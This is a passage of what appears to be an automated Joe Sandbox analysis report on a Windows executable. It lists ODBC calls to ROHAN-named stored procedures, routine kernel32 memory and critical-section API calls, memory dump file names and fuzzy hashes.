                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_ReloadRollingNotice] },000000FD), ref: 004397C1
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00439803
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_ReloadRollingNotice] }, xrefs: 004397B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_ReloadRollingNotice] }
                                                                                      • API String ID: 0-3458218849
                                                                                      • Opcode ID: 0e0d4f67bfb150fee81beca4023c8728901cd89ea5571755e152fba3a888797a
                                                                                      • Instruction ID: 5df69eeabea16424261aacdb92154157cf177264d271ce3858b5d8c705df94e1
                                                                                      • Opcode Fuzzy Hash: 0e0d4f67bfb150fee81beca4023c8728901cd89ea5571755e152fba3a888797a
                                                                                      • Instruction Fuzzy Hash: 4AF0F4B1645219A7FB20DF84CD51F6A7364EB80714F2042CAF6146A2C4D5756950DBA8
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_RefreshGetItemControlList] },000000FD), ref: 00438A68
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00438AAA
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_RefreshGetItemControlList] }, xrefs: 00438A5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_RefreshGetItemControlList] }
                                                                                      • API String ID: 0-859345910
                                                                                      • Opcode ID: c58c06e5e32d08e512726807ecb5725cfd06b9b3db6c8347eddf951f5e5f9bc0
                                                                                      • Instruction ID: 1673100a124b3c276a601b23a491701b15d70af0fd8664aa1e544b1b12a9b970
                                                                                      • Opcode Fuzzy Hash: c58c06e5e32d08e512726807ecb5725cfd06b9b3db6c8347eddf951f5e5f9bc0
                                                                                      • Instruction Fuzzy Hash: 77F019B1655218A7DB20CF84CC41F6A7374EB40714F10828BFA186E6C4D6757D508FA9
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_LoadRollingNotice] },000000FD), ref: 00439764
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004397A3
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_LoadRollingNotice] }, xrefs: 0043975B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_LoadRollingNotice] }
                                                                                      • API String ID: 0-4061518715
                                                                                      • Opcode ID: 99f2327a2766bbe737734ff5e34988714903710180a4e98edb19bd2788d7a423
                                                                                      • Instruction ID: e3529e90b01828434d8a96cafd058b8dac92a5df8f77b5ef8686cb29f40ce7e9
                                                                                      • Opcode Fuzzy Hash: 99f2327a2766bbe737734ff5e34988714903710180a4e98edb19bd2788d7a423
                                                                                      • Instruction Fuzzy Hash: ECF0FEB1A54319EBEB20CF84CC41FAA7374FB44714F21828FF6142A2C4D7B569408FA8
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_BattlePointInfoReset]},000000FD), ref: 00439821
                                                                                      • #72.ODBC32(?,00000001,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,{? = CALL [ROHAN_BattlePointInfoReset]},000000FD), ref: 00439844
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_BattlePointInfoReset]}, xrefs: 00439818
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_BattlePointInfoReset]}
                                                                                      • API String ID: 0-3848384410
                                                                                      • Opcode ID: 0821973d089d7e15a4f1f9b6b02fefb3485ca9aac1e51abcd444ecb731b827cb
                                                                                      • Instruction ID: 64cc7feccbd70fc422071cc1c18d607c44434d73a959a8145b744a048087c675
                                                                                      • Opcode Fuzzy Hash: 0821973d089d7e15a4f1f9b6b02fefb3485ca9aac1e51abcd444ecb731b827cb
                                                                                      • Instruction Fuzzy Hash: A7E0487079430577FA20DF548C42F597324DB40B24F20834BFB242E1C5D5B5B8108B5D
                                                                                      APIs
                                                                                      • DeleteCriticalSection.KERNEL32(I!G,?,?,00472149,?,?,004700AB,00000003), ref: 00474ABE
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00472149,?,?,004700AB,00000003), ref: 00474ADB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalDeleteFreeSectionVirtual
                                                                                      • String ID: I!G
                                                                                      • API String ID: 1891443581-3828199053
                                                                                      • Opcode ID: 7cba5ab1d099e9107b3f9b1c82e2d360ee41017a215c846d2009836e456e394c
                                                                                      • Instruction ID: fcc9de670f0371a22fa2e1e3beaa192cd056bb7c207af7fad98f59721f7da305
                                                                                      • Opcode Fuzzy Hash: 7cba5ab1d099e9107b3f9b1c82e2d360ee41017a215c846d2009836e456e394c
                                                                                      • Instruction Fuzzy Hash: B1E04F78940208EBCB04CB98D849F9AB378EB45305F208194F809A7352C7319E40CB98
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0046A4F6,?,00411D24), ref: 0046C7B0
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0046C7ED
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0046C8C6
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0046C8D8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                      • String ID:
                                                                                      • API String ID: 3168844106-0
                                                                                      • Opcode ID: e733040ca179c056a8cf40d129b0ecef9d914573e58150de5333525e0781c981
                                                                                      • Instruction ID: 498af56b7bb8f34ae614fda91a596c7884d20743c63bc05cb2bf0d3013be4e07
                                                                                      • Opcode Fuzzy Hash: e733040ca179c056a8cf40d129b0ecef9d914573e58150de5333525e0781c981
                                                                                      • Instruction Fuzzy Hash: C4418274E00209EFCB08CFA9D584AADBBB1FF88319F20816AE445BB355D734AA41DF55
                                                                                      APIs
                                                                                      • HeapReAlloc.KERNEL32(00000000,00000000,?,?,?,0045FF1A,?,?,?,?,?,?,?,?), ref: 0046018D
                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,000041C4,?,?,0045FF1A,?,?,?,?,?,?,?,?), ref: 004601B7
                                                                                      • VirtualAlloc.KERNEL32(00000000,01000000,00002000,00000004,?,?,?,?,?,?), ref: 004601D2
                                                                                      • HeapFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 004601E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHeap$FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3499195154-0
                                                                                      • Opcode ID: 7ea29c959c9f87340f4acfa030f9f3a838bc961c90e97342da117e86a4312cba
                                                                                      • Instruction ID: c8a73aa1e12c8bca2422c738448110e8196419665a2e80a3bf326bb98382a346
                                                                                      • Opcode Fuzzy Hash: 7ea29c959c9f87340f4acfa030f9f3a838bc961c90e97342da117e86a4312cba
                                                                                      • Instruction Fuzzy Hash: B21117B4200702AFE364CF29EC45B52B7F4BB45720F108A2EE565CB691E7B1E8558B94
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(004ECE6C,?,00000000,?,?,004B9E99,00000010,?,?,?,?,?,004B8D0C,004B8CA4,004B878D,004A2D43), ref: 004BA42E
                                                                                      • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,004B9E99,00000010,?,?,?,?,?,004B8D0C,004B8CA4,004B878D,004A2D43), ref: 004BA440
                                                                                      • LeaveCriticalSection.KERNEL32(004ECE6C,?,00000000,?,?,004B9E99,00000010,?,?,?,?,?,004B8D0C,004B8CA4,004B878D,004A2D43), ref: 004BA449
                                                                                      • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,004B9E99,00000010,?,?,?,?,?,004B8D0C,004B8CA4,004B878D,004A2D43,00412E13), ref: 004BA45B
                                                                                        • Part of subcall function 004BA397: InitializeCriticalSection.KERNEL32(004ECE6C,004BA40E,004B9E99,00000010,?,?,?,?,?,004B8D0C,004B8CA4,004B878D,004A2D43,00412E13,00000000), ref: 004BA3AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
